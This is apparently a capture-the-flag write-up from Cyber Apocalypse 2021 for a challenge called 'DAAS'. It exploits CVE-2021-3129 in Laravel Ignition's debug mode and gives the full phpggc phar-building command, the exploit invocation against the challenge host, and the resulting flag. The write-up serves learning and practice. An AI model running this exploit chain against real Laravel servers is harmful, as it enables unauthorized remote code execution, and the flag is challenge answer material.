Cyber Apocalypse 2021
DAAS
Solved by: Nigamelastic
- The hint for this challenge talks about being stuck in debug.
- Some research shows there is a CVE for this, and the Laravel version were working with is vulnerable.
- https://www.exploit-db.com/exploits/49424
- https://www.youtube.com/watch?v=gr8ZKQpYiug&
CVE-2021-3129 : https://nvd.nist.gov/vuln/detail/CVE-2021-3129
- Find
ip/_ignition/execute-solution
- For a laravel panel with error messages and stack trace.
- https://www.ambionics.io/blog/laravel-debug-rce
- As mentioned in the blog above i tried performing a post request but it gave me a 302 response
- but the above link mentions their github page and exploit which is
https://github.com/ambionics/phpggcandhttps://github.com/ambionics/laravel-exploits
the idea is to get the phar file with ur custom command from 1st repo and then put the phar file into the exploit with specified url to run the exploit
PS: for a linux command with spaces simply use "
- so for our case since we know the flag was found on the root directory and its name as
flagM1AhS
- our phpggc command should be
php -d'phar.readonly=0' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system "cat /flagM1AhS"
- run that in the exploit as:
./laravel-ignition-rce.py http://165.227.234.7:31636/ /tmp/exploit.phar
- and we have the flag:
CHTB{wh3n_7h3_d3bu663r_7urn5_4641n57_7h3_d3bu6633}